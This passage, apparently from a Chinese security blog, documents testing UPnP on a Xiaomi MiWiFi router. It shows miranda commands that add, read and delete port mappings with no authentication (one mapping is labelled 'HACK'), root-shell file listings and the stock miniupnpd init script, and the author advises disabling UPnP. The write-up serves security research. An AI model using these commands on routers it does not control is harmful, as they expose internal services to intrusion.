MiWiFi Router</span><br><span class="line">          UPC: <span class="number">000000000000</span></span><br><span class="line">          modelNumber: <span class="number">20180830</span></span><br><span class="line">          presentationURL: http://miwifi.com/</span><br><span class="line">          friendlyName: MiWiFi router</span><br><span class="line">          fullName: urn:schemas-upnp-org:device:InternetGatewayDevice:<span class="number">1</span></span><br><span class="line">          modelDescription: MiWiFi Router</span><br><span class="line">          UDN: uuid:f3539dd5-<span class="number">8</span>dc5-<span class="number">420</span>c-<span class="number">9070</span>-c6f66d27fc8c</span><br><span class="line">          modelURL: http://www1.miwifi.com</span><br><span class="line">          manufacturer: Xiaomi</span><br><span class="line">          WANDevice</span><br><span class="line">          manufacturerURL: http://miniupnp.free.fr/</span><br><span class="line">          modelName: WAN Device</span><br><span class="line">          UPC: <span class="number">000000000000</span></span><br><span class="line">          modelNumber: <span class="number">20180830</span></span><br><span class="line">          friendlyName: WANDevice</span><br><span class="line">          fullName: urn:schemas-upnp-org:device:WANDevice:<span class="number">1</span></span><br><span class="line">          modelDescription: WAN Device</span><br><span class="line">          UDN: uuid:f3539dd5-<span class="number">8</span>dc5-<span class="number">420</span>c-<span class="number">9070</span>-c6f66d27fc8d</span><br><span class="line">          modelURL: http://miniupnp.free.fr/</span><br><span class="line">          manufacturer: MiniUPnP</span><br><span class="line">          WANConnectionDevice</span><br><span class="line">          manufacturerURL: http://miniupnp.free.fr/</span><br><span class="line">          modelName: MiniUPnPd</span><br><span class="line">          UPC: <span class="number">000000000000</span></span><br><span class="line">          modelNumber: <span class="number">20180830</span></span><br><span class="line">          friendlyName: WANConnectionDevice</span><br><span class="line">          fullName: urn:schemas-upnp-org:device:WANConnectionDevice:<span class="number">1</span></span><br><span class="line">          modelDescription: MiniUPnP daemon</span><br><span class="line">          UDN: uuid:f3539dd5-<span class="number">8</span>dc5-<span class="number">420</span>c-<span class="number">9070</span>-c6f66d27fc8e</span><br><span class="line">          modelURL: http://miniupnp.free.fr/</span><br><span class="line">          manufacturer: MiniUPnP</span><br></pre></td></tr></table></figure><ul><li>使用miranda发送UPnP命令<br><strong>获取外部IP地址</strong></li></ul><figure class="highlight css"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="selector-tag">upnp</span>&gt; <span class="selector-tag">host</span> <span class="selector-tag">send</span> 0 <span class="selector-tag">WANConnectionDevice</span> <span class="selector-tag">WANIPConnection</span> <span class="selector-tag">GetExternalIPAddress</span></span><br><span class="line"></span><br><span class="line"><span class="selector-tag">NewExternalIPAddress</span> : 172<span class="selector-class">.16</span><span class="selector-class">.173</span><span class="selector-class">.231</span></span><br></pre></td></tr></table></figure><p><strong>增加一个端口映射，将路由器上端口为1900的服务映射到外网端口8080</strong></p><figure class="highlight gams"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br></pre></td><td class="code"><pre><span class="line">upnp&gt; host send <span class="number">0</span> WANConnectionDevice WANIPConnection AddPortMapping</span><br><span class="line"></span><br><span class="line">Required argument:</span><br><span class="line">Argument Name:  NewPortMappingDescription</span><br><span class="line">Data Type:      string</span><br><span class="line">Allowed Values: []</span><br><span class="line"><span class="keyword">Set</span> NewPortMappingDescription <span class="comment">value to: HACK</span></span><br><span class="line"></span><br><span class="line">Required <span class="comment">argument:</span></span><br><span class="line">Argument <span class="comment">Name:  NewLeaseDuration</span></span><br><span class="line">Data <span class="comment">Type:      ui4</span></span><br><span class="line">Allowed <span class="comment">Values: []</span></span><br><span class="line">Value <span class="comment">Min:      0</span></span><br><span class="line">Value <span class="comment">Max:      604800</span></span><br><span class="line"><span class="keyword">Set</span> <span class="comment">NewLeaseDuration value to: 0</span></span><br><span class="line"></span><br><span class="line">Required <span class="comment">argument:</span></span><br><span class="line">Argument <span class="comment">Name:  NewInternalClient</span></span><br><span class="line">Data <span class="comment">Type:      string</span></span><br><span class="line">Allowed <span class="comment">Values: []</span></span><br><span class="line"><span class="keyword">Set</span> <span class="comment">NewInternalClient value to: 192.168.31.1</span></span><br><span class="line"></span><br><span class="line">Required <span class="comment">argument:</span></span><br><span class="line">Argument <span class="comment">Name:  NewEnabled</span></span><br><span class="line">Data <span class="comment">Type:      boolean</span></span><br><span class="line">Allowed <span class="comment">Values: []</span></span><br><span class="line"><span class="keyword">Set</span> <span class="comment">NewEnabled value to: 1</span></span><br><span class="line"></span><br><span class="line">Required <span class="comment">argument:</span></span><br><span class="line">Argument <span class="comment">Name:  NewExternalPort</span></span><br><span class="line">Data <span class="comment">Type:      ui2</span></span><br><span class="line">Allowed <span class="comment">Values: []</span></span><br><span class="line"><span class="keyword">Set</span> <span class="comment">NewExternalPort value to: 8080</span></span><br><span class="line"></span><br><span class="line">Required <span class="comment">argument:</span></span><br><span class="line">Argument <span class="comment">Name:  NewRemoteHost</span></span><br><span class="line">Data <span class="comment">Type:      string</span></span><br><span class="line">Allowed <span class="comment">Values: []</span></span><br><span class="line"><span class="keyword">Set</span> <span class="comment">NewRemoteHost value to:</span></span><br><span class="line"></span><br><span class="line">Required <span class="comment">argument:</span></span><br><span class="line">Argument <span class="comment">Name:  NewProtocol</span></span><br><span class="line">Data <span class="comment">Type:      string</span></span><br><span class="line">Allowed <span class="comment">Values: [</span><span class="comment">'TCP'</span><span class="comment">,</span> <span class="comment">'UDP'</span><span class="comment">]</span></span><br><span class="line"><span class="keyword">Set</span> <span class="comment">NewProtocol value to: TCP</span></span><br><span class="line"></span><br><span class="line">Required <span class="comment">argument:</span></span><br><span class="line">Argument <span class="comment">Name:  NewInternalPort</span></span><br><span class="line">Data <span class="comment">Type:      ui2</span></span><br><span class="line">Allowed <span class="comment">Values: []</span></span><br><span class="line">Value <span class="comment">Min:      1</span></span><br><span class="line">Value <span class="comment">Max:      65535</span></span><br><span class="line"><span class="keyword">Set</span> <span class="comment">NewInternalPort value to: 1900</span></span><br></pre></td></tr></table></figure><figure class="highlight groovy"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line">upnp&gt; host send <span class="number">0</span> WANConnectionDevice WANIPConnection GetSpecificPortMappingEntry</span><br><span class="line"></span><br><span class="line">  Required <span class="string">argument:</span></span><br><span class="line">  Argument <span class="string">Name:</span>  NewExternalPort</span><br><span class="line">  Data <span class="string">Type:</span>      ui2</span><br><span class="line">  Allowed <span class="string">Values:</span> []</span><br><span class="line">  Set NewExternalPort value <span class="string">to:</span> <span class="number">8080</span></span><br><span class="line"></span><br><span class="line">  Required <span class="string">argument:</span></span><br><span class="line">  Argument <span class="string">Name:</span>  NewRemoteHost</span><br><span class="line">  Data <span class="string">Type:</span>      string</span><br><span class="line">  Allowed <span class="string">Values:</span> []</span><br><span class="line">  Set NewRemoteHost value <span class="string">to:</span></span><br><span class="line"></span><br><span class="line">  Required <span class="string">argument:</span></span><br><span class="line">  Argument <span class="string">Name:</span>  NewProtocol</span><br><span class="line">  Data <span class="string">Type:</span>      string</span><br><span class="line">  Allowed <span class="string">Values:</span> [<span class="string">'TCP'</span>, <span class="string">'UDP'</span>]</span><br><span class="line">  Set NewProtocol value <span class="string">to:</span> TCP</span><br><span class="line"></span><br><span class="line">  <span class="string">NewPortMappingDescription :</span> HACK</span><br><span class="line">  <span class="string">NewLeaseDuration :</span> <span class="number">0</span></span><br><span class="line">  <span class="string">NewInternalClient :</span> <span class="number">192.168</span><span class="number">.31</span><span class="number">.1</span></span><br><span class="line">  <span class="string">NewEnabled :</span> <span class="number">1</span></span><br><span class="line">  <span class="string">NewInternalPort :</span> <span class="number">1900</span></span><br></pre></td></tr></table></figure><p><strong>可以无需验证地删除映射</strong><br><figure class="highlight autoit"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">upnp&gt; host <span class="built_in">send</span> <span class="number">0</span> WANConnectionDevice WANIPConnection DeletePortMapping</span><br></pre></td></tr></table></figure></p><p><img src="https://res.cloudinary.com/dozyfkbg3/image/upload/v1555918880/paper/2231.png" alt><br>虽然UPnP是一种很少理解的协议，但它在绝大多数家庭网络上都很活跃，甚至在某些公司网络上也是如此。许多设备支持UPnP以便于消费者使用，但是，它们通常支持不允许任何服务自动执行的操作，尤其是未经授权的情况下。更糟糕的是，协议实现本身很少以安全思维构建，使其可以进一步利用。<br>防止本地/远程利用UPnP的最佳方法是在任何/所有网络设备上禁用该功能。然而，考虑到这个协议和其他“自动魔术”协议旨在帮助懒惰的用户，他们可能不知道这些协议的危险，唯一真正的解决方案是让供应商更加关注他们的设计和实施，并且更加安全。</p><h2 id="浏览配置文件"><a href="#浏览配置文件" class="headerlink" title="浏览配置文件"></a>浏览配置文件</h2><h3 id="通过find命令搜索"><a href="#通过find命令搜索" class="headerlink" title="通过find命令搜索"></a>通过find命令搜索</h3><pre>root@XiaoQiang:/# find -name *upnp*./etc/rc.d/S95miniupnpd./etc/init.d/miniupnpd./etc/hotplug.d/iface/50-miniupnpd./etc/config/upnpd./tmp/upnp.leases./tmp/etc/miniupnpd.conf./tmp/run/miniupnpd.pid./usr/lib/lua/luci/view/web/setting/upnp.htm./usr/sbin/miniupnpd./usr/share/miniupnpd./www/xiaoqiang/web/css/upnp.css./data/etc/rc.d/S95miniupnpd./data/etc/init.d/miniupnpd./data/etc/hotplug.d/iface/50-miniupnpd./data/etc/config/upnpd</pre><ul><li>/etc/rc.d 启动的配置文件和脚本</li></ul><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br><span class="line">136</span><br><span class="line">137</span><br><span class="line">138</span><br><span class="line">139</span><br><span class="line">140</span><br><span class="line">141</span><br><span class="line">142</span><br><span class="line">143</span><br><span class="line">144</span><br><span class="line">145</span><br><span class="line">146</span><br><span class="line">147</span><br><span class="line">148</span><br><span class="line">149</span><br><span class="line">150</span><br><span class="line">151</span><br><span class="line">152</span><br><span class="line">153</span><br><span class="line">154</span><br><span class="line">155</span><br><span class="line">156</span><br><span class="line">157</span><br><span class="line">158</span><br><span class="line">159</span><br><span class="line">160</span><br><span class="line">161</span><br><span class="line">162</span><br><span class="line">163</span><br><span class="line">164</span><br><span class="line">165</span><br><span class="line">166</span><br><span class="line">167</span><br><span class="line">168</span><br><span class="line">169</span><br><span class="line">170</span><br><span class="line">171</span><br><span class="line">172</span><br><span class="line">173</span><br><span class="line">174</span><br><span class="line">175</span><br><span class="line">176</span><br><span class="line">177</span><br><span class="line">178</span><br><span class="line">179</span><br></pre></td><td class="code"><pre><span class="line">!/bin/sh /etc/rc.common</span><br><span class="line"><span class="comment"># Copyright (C) 2006-2011 OpenWrt.org</span></span><br><span class="line"></span><br><span class="line">START=95</span><br><span class="line">SERVICE_USE_PID=1</span><br><span class="line"><span class="function"><span class="title">upnpd_get_port_range</span></span>() &#123;</span><br><span class="line">        <span class="built_in">local</span> _var=<span class="string">"<span class="variable">$1</span>"</span>; <span class="built_in">shift</span></span><br><span class="line">        <span class="built_in">local</span> _val</span><br><span class="line">        config_get _val <span class="string">"<span class="variable">$@</span>"</span></span><br><span class="line">        <span class="keyword">case</span> <span class="string">"<span class="variable">$_val</span>"</span> <span class="keyword">in</span></span><br><span class="line">                [0-9]*[:-][0-9]*)</span><br><span class="line">                        <span class="built_in">export</span> -n -- <span class="string">"<span class="variable">$&#123;_var&#125;</span>_start=<span class="variable">$&#123;_val%%[:-]*&#125;</span>"</span></span><br><span class="line">                        <span class="built_in">export</span> -n -- <span class="string">"<span class="variable">$&#123;_var&#125;</span>_end=<span class="variable">$&#123;_val##*[:-]&#125;</span>"</span></span><br><span class="line">                ;;</span><br><span class="line">                [0-9]*)</span><br><span class="line">                        <span class="built_in">export</span> -n -- <span class="string">"<span class="variable">$&#123;_var&#125;</span>_start=<span class="variable">$_val</span>"</span></span><br><span class="line">                        <span class="built_in">export</span> -n -- <span class="string">"<span class="variable">$&#123;_var&#125;</span>_end="</span></span><br><span class="line">                ;;</span><br><span class="line">        <span class="keyword">esac</span></span><br><span class="line">&#125;</span><br><span class="line"><span class="function"><span class="title">conf_rule_add</span></span>() &#123;</span><br><span class="line">        <span class="built_in">local</span> cfg=<span class="string">"<span class="variable">$1</span>"</span></span><br><span class="line">        <span class="built_in">local</span> tmpconf=<span class="string">"<span class="variable">$2</span>"</span></span><br><span class="line">        <span class="built_in">local</span> action external_port_start external_port_end int_addr</span><br><span class="line">        <span class="built_in">local</span> internal_port_start internal_port_end</span><br><span class="line"></span><br><span class="line">        config_get action <span class="string">"<span class="variable">$cfg</span>"</span> action <span class="string">"deny"</span>               <span class="comment"># allow or deny</span></span><br><span class="line">        upnpd_get_port_range <span class="string">"ext"</span> <span class="string">"<span class="variable">$cfg</span>"</span> ext_ports <span class="string">"0-65535"</span> <span class="comment"># external ports: x, x-y, x:y</span></span><br><span class="line">        config_get int_addr <span class="string">"<span class="variable">$cfg</span>"</span> int_addr <span class="string">"0.0.0.0/0"</span>       <span class="comment"># ip or network and subnet mask (internal)</span></span><br><span class="line">        upnpd_get_port_range <span class="string">"int"</span> <span class="string">"<span class="variable">$cfg</span>"</span> int_ports <span class="string">"0-65535"</span> <span class="comment"># internal ports: x, x-y, x:y or range</span></span><br><span class="line"></span><br><span class="line">        <span class="comment"># Make a single IP IP/32 so that miniupnpd.conf can use it.</span></span><br><span class="line">        <span class="keyword">case</span> <span class="string">"<span class="variable">$int_addr</span>"</span> <span class="keyword">in</span></span><br><span class="line">                */*) ;;</span><br><span class="line">                *) int_addr=<span class="string">"<span class="variable">$int_addr</span>/32"</span> ;;</span><br><span class="line">        <span class="keyword">esac</span></span><br><span class="line"></span><br><span class="line">        <span class="built_in">echo</span> <span class="string">"<span class="variable">$&#123;action&#125;</span> <span class="variable">$&#123;ext_start&#125;</span><span class="variable">$&#123;ext_end:+-&#125;</span><span class="variable">$&#123;ext_end&#125;</span> <span class="variable">$&#123;int_addr&#125;</span> <span class="variable">$&#123;int_start&#125;</span><span class="variable">$&#123;int_end:+-&#125;</span><span class="variable">$&#123;int_end&#125;</span>"</span> &gt;&gt;<span class="variable">$tmpconf</span></span><br><span class="line">&#125;</span><br><span class="line"><span class="function"><span class="title">upnpd_write_bool</span></span>() &#123;                                                                                                   </span><br><span class="line">        <span class="built_in">local</span> opt=<span class="string">"<span class="variable">$1</span>"</span>                                                                                                 </span><br><span class="line">        <span class="built_in">local</span> def=<span class="string">"<span class="variable">$&#123;2:-0&#125;</span>"</span>                                                                                            </span><br><span class="line">        <span class="built_in">local</span> alt=<span class="string">"<span class="variable">$3</span>"</span>                                                                                                 </span><br><span class="line">        <span class="built_in">local</span> val                                                                                                      </span><br><span class="line"></span><br><span class="line">        config_get_bool val config <span class="string">"<span class="variable">$opt</span>"</span> <span class="string">"<span class="variable">$def</span>"</span>                                                                       </span><br><span class="line">        <span class="keyword">if</span> [ <span class="string">"<span class="variable">$val</span>"</span> -eq 0 ]; <span class="keyword">then</span>                                                                                      </span><br><span class="line">                <span class="built_in">echo</span> <span class="string">"<span class="variable">$&#123;alt:-$opt&#125;</span>=no"</span> &gt;&gt; <span class="variable">$tmpconf</span>                                                                     </span><br><span class="line">        <span class="keyword">else</span>                                                                                                           </span><br><span class="line">                <span class="built_in">echo</span> <span class="string">"<span class="variable">$&#123;alt:-$opt&#125;</span>=yes"</span> &gt;&gt; <span class="variable">$tmpconf</span>                                                                    </span><br><span class="line">        <span class="keyword">fi</span>                                                                                                             </span><br><span class="line">&#125;                                                                                                                      </span><br><span class="line"></span><br><span class="line"><span class="function"><span class="title">boot</span></span>() &#123;                                                                                                               </span><br><span class="line">        <span class="built_in">return</span> 0                                                                                                       </span><br><span class="line">&#125;                                                                                                                      </span><br><span class="line"></span><br><span class="line"><span class="function"><span class="title">start</span></span>() &#123;                                                                                                              </span><br><span class="line">        config_load <span class="string">"upnpd"</span>                                                                                            </span><br><span class="line">        <span class="built_in">local</span> extiface intiface upload download logging secure enabled natpmp                                          </span><br><span class="line">        <span class="built_in">local</span> extip port usesysuptime conffile serial_number model_number                                              </span><br><span class="line">        <span class="built_in">local</span> uuid notify_interval presentation_url enable_upnp                                                        </span><br><span class="line">        <span class="built_in">local</span> upnp_lease_file clean_ruleset_threshold clean_ruleset_interval                                           </span><br><span class="line"></span><br><span class="line">        config_get extiface config external_iface                                                                      </span><br><span class="line">        config_get intiface config internal_iface                                                                      </span><br><span class="line">        config_get extip config external_ip                                                                            </span><br><span class="line">        config_get port config port 5000                                                                               </span><br><span class="line">        config_get upload   config upload                                                                              </span><br><span class="line">        config_get download config download                                                                            </span><br><span class="line">        config_get_bool logging config log_output 0                                                                    </span><br><span class="line">        config_get conffile config config_file                                                                         </span><br><span class="line">        config_get serial_number config serial_number                                                                  </span><br><span class="line">        config_get model_number config model_number                                                                    </span><br><span class="line">        config_get uuid config uuid                                                                                    </span><br><span class="line">        config_get notify_interval config notify_interval                                                              </span><br><span class="line">        config_get presentation_url config presentation_url                                                            </span><br><span class="line">        config_get upnp_lease_file config upnp_lease_file                                                              </span><br><span class="line">        config_get clean_ruleset_threshold config clean_ruleset_threshold                                              </span><br><span class="line">        config_get clean_ruleset_interval config clean_ruleset_interval                                                </span><br><span class="line"></span><br><span class="line">        <span class="built_in">local</span> args                                                                                                     </span><br><span class="line"></span><br><span class="line">        . /lib/<span class="built_in">functions</span>/network.sh        </span><br><span class="line">        <span class="built_in">local</span> ifname                                                                                                   </span><br><span class="line">        network_get_device ifname <span class="variable">$&#123;extiface:-wan&#125;</span>                                                                     </span><br><span class="line"></span><br><span class="line">        <span class="keyword">if</span> [ -n <span class="string">"<span class="variable">$conffile</span>"</span> ]; <span class="keyword">then</span>                                                                                    </span><br><span class="line">                args=<span class="string">"-f <span class="variable">$conffile</span>"</span>                                                                                    </span><br><span class="line">        <span class="keyword">else</span>                                                                                                           </span><br><span class="line">                <span class="built_in">local</span> tmpconf=<span class="string">"/var/etc/miniupnpd.conf"</span>                                                                </span><br><span class="line">                args=<span class="string">"-f <span class="variable">$tmpconf</span>"</span>                                                                                     </span><br><span class="line">                mkdir -p /var/etc                                                                                      </span><br><span class="line"></span><br><span class="line">                <span class="built_in">echo</span> <span class="string">"ext_ifname=<span class="variable">$ifname</span>"</span> &gt;<span class="variable">$tmpconf</span>                                                                    </span><br><span class="line"></span><br><span class="line">                [ -n <span class="string">"<span class="variable">$extip</span>"</span> ] &amp;&amp; \                                                                                   </span><br><span class="line">                        <span class="built_in">echo</span> <span class="string">"ext_ip=<span class="variable">$extip</span>"</span> &gt;&gt;<span class="variable">$tmpconf</span>                                                                </span><br><span class="line"></span><br><span class="line">                <span class="built_in">local</span> iface                                                                                            </span><br><span class="line">                <span class="keyword">for</span> iface <span class="keyword">in</span> <span class="variable">$&#123;intiface:-lan&#125;</span>; <span class="keyword">do</span>                                                                      </span><br><span class="line">                        <span class="built_in">local</span> device                                                                                   </span><br><span class="line">                        network_get_device device <span class="string">"<span class="variable">$iface</span>"</span> &amp;&amp; &#123;                                                        </span><br><span class="line">                                <span class="built_in">echo</span> <span class="string">"listening_ip=<span class="variable">$device</span>"</span> &gt;&gt;<span class="variable">$tmpconf</span>                                                 </span><br><span class="line">                        &#125;                                                                                              </span><br><span class="line">                <span class="keyword">done</span>                                                                                                   </span><br><span class="line"></span><br><span class="line">                [ <span class="string">"<span class="variable">$port</span>"</span> != <span class="string">"auto"</span> ] &amp;&amp; \                                                                             </span><br><span class="line">                        <span class="built_in">echo</span> <span class="string">"port=<span class="variable">$port</span>"</span> &gt;&gt;<span class="variable">$tmpconf</span>                                                                   </span><br><span class="line"></span><br><span class="line">                config_load <span class="string">"upnpd"</span>                                                                                    </span><br><span class="line">                upnpd_write_bool enable_natpmp 1                             </span><br><span class="line">                upnpd_write_bool enable_upnp 1                               </span><br><span class="line">                upnpd_write_bool secure_mode 1                               </span><br><span class="line">                upnpd_write_bool system_uptime 1    </span><br><span class="line">                [ -n <span class="string">"<span class="variable">$upnp_lease_file</span>"</span> ] &amp;&amp; &#123;                                                                         </span><br><span class="line">                        touch <span class="variable">$upnp_lease_file</span>                                                                         </span><br><span class="line">                        <span class="built_in">echo</span> <span class="string">"lease_file=<span class="variable">$upnp_lease_file</span>"</span> &gt;&gt;<span class="variable">$tmpconf</span>                                                  </span><br><span class="line">                &#125;                                                                                                      </span><br><span class="line"></span><br><span class="line">                [ -n <span class="string">"<span class="variable">$upload</span>"</span> -a -n <span class="string">"<span class="variable">$download</span>"</span> ] &amp;&amp; &#123;                                                                </span><br><span class="line">                        <span class="built_in">echo</span> <span class="string">"bitrate_down=<span class="variable">$(($download * 1024 * 8)</span>)"</span> &gt;&gt;<span class="variable">$tmpconf</span>                                       </span><br><span class="line">                        <span class="built_in">echo</span> <span class="string">"bitrate_up=<span class="variable">$(($upload * 1024 * 8)</span>)"</span> &gt;&gt;<span class="variable">$tmpconf</span>                                           </span><br><span class="line">                &#125;                                                                                                      </span><br><span class="line"></span><br><span class="line">                [ -n <span class="string">"<span class="variable">$&#123;presentation_url&#125;</span>"</span> ] &amp;&amp; \                                                                      </span><br><span class="line">                        <span class="built_in">echo</span> <span class="string">"presentation_url=<span class="variable">$&#123;presentation_url&#125;</span>"</span> &gt;&gt;<span class="variable">$tmpconf</span>                                         </span><br><span class="line"></span><br><span class="line">                [ -n <span class="string">"<span class="variable">$&#123;notify_interval&#125;</span>"</span> ] &amp;&amp; \                                                                       </span><br><span class="line">                        <span class="built_in">echo</span> <span class="string">"notify_interval=<span class="variable">$&#123;notify_interval&#125;</span>"</span> &gt;&gt;<span class="variable">$tmpconf</span>                                           </span><br><span class="line"></span><br><span class="line">                [ -n <span class="string">"<span class="variable">$&#123;clean_ruleset_threshold&#125;</span>"</span> ] &amp;&amp; \                                                               </span><br><span class="line">                        <span class="built_in">echo</span> <span class="string">"clean_ruleset_threshold=<span class="variable">$&#123;clean_ruleset_threshold&#125;</span>"</span> &gt;&gt;<span class="variable">$tmpconf</span>                           </span><br><span class="line"></span><br><span class="line">                [ -n <span class="string">"<span class="variable">$&#123;clean_ruleset_interval&#125;</span>"</span> ] &amp;&amp; \                                                                </span><br><span class="line">                        <span class="built_in">echo</span> <span class="string">"clean_ruleset_interval=<span class="variable">$&#123;clean_ruleset_interval&#125;</span>"</span> &gt;&gt;<span class="variable">$tmpconf</span>                             </span><br><span class="line"></span><br><span class="line">                [ -z <span class="string">"<span class="variable">$uuid</span>"</span> ] &amp;&amp; &#123;                                                                                    </span><br><span class="line">                        uuid=<span class="string">"<span class="variable">$(cat /proc/sys/kernel/random/uuid)</span>"</span>                                                     </span><br><span class="line">                        uci <span class="built_in">set</span> upnpd.config.uuid=<span class="variable">$uuid</span>                                                                </span><br><span class="line">                        uci commit upnpd                                                                               </span><br><span class="line">                &#125;                                                                                                      </span><br><span class="line"></span><br><span class="line">                [ <span class="string">"<span class="variable">$uuid</span>"</span> = <span class="string">"nocli"</span> ] || \                                                                             </span><br><span class="line">                        <span class="built_in">echo</span> <span class="string">"uuid=<span class="variable">$uuid</span>"</span> &gt;&gt;<span class="variable">$tmpconf</span>                                                                   </span><br><span class="line"></span><br><span class="line">                [ -n <span class="string">"<span class="variable">$&#123;serial_number&#125;</span>"</span> ] &amp;&amp; \                                                                         </span><br><span class="line">                        <span class="built_in">echo</span> <span class="string">"serial=<span class="variable">$&#123;serial_number&#125;</span>"</span> &gt;&gt;<span class="variable">$tmpconf</span>                                                      </span><br><span class="line"></span><br><span class="line">                [ -n <span class="string">"<span class="variable">$&#123;model_number&#125;</span>"</span> ] &amp;&amp; \                                               </span><br><span class="line">                        <span class="built_in">echo</span> <span class="string">"model_number=<span class="variable">$&#123;model_number&#125;</span>"</span> &gt;&gt;<span class="variable">$tmpconf</span>        </span><br><span class="line">                        config_foreach conf_rule_add perm_rule <span class="string">"<span class="variable">$tmpconf</span>"</span>                                                          </span><br><span class="line">                    <span class="keyword">fi</span>                                                                                                             </span><br><span class="line"></span><br><span class="line"></span><br><span class="line">                    <span class="keyword">if</span> [ -n <span class="string">"<span class="variable">$ifname</span>"</span> ]; <span class="keyword">then</span>                                                                                      </span><br><span class="line">                            <span class="comment"># start firewall                                                                                       </span></span><br><span class="line">                            iptables -L MINIUPNPD &gt;/dev/null 2&gt;/dev/null || fw3 reload                                             </span><br><span class="line"></span><br><span class="line">                            <span class="keyword">if</span> [ <span class="string">"<span class="variable">$logging</span>"</span> = <span class="string">"1"</span> ]; <span class="keyword">then</span>                                                                          </span><br><span class="line">                                    SERVICE_DAEMONIZE=1 \                                                                          </span><br><span class="line">                                    service_start /usr/sbin/miniupnpd <span class="variable">$args</span> -d                                                     </span><br><span class="line">                            <span class="keyword">else</span>                                                                                                   </span><br><span class="line">                                    SERVICE_DAEMONIZE= \                                                                           </span><br><span class="line">                                    service_start /usr/sbin/miniupnpd <span class="variable">$args</span>                                                        </span><br><span class="line">                            <span class="keyword">fi</span>                                                                                                     </span><br><span class="line">                    <span class="keyword">else</span>                                                                                                           </span><br><span class="line">                            logger -t <span class="string">"upnp daemon"</span> <span class="string">"external interface not found, not starting"</span>                                   </span><br><span class="line">                    <span class="keyword">fi</span>                                                                                                             </span><br><span class="line">                    <span class="built_in">return</span> 0                                                                                                       </span><br><span class="line">            &#125;                                                                                                                      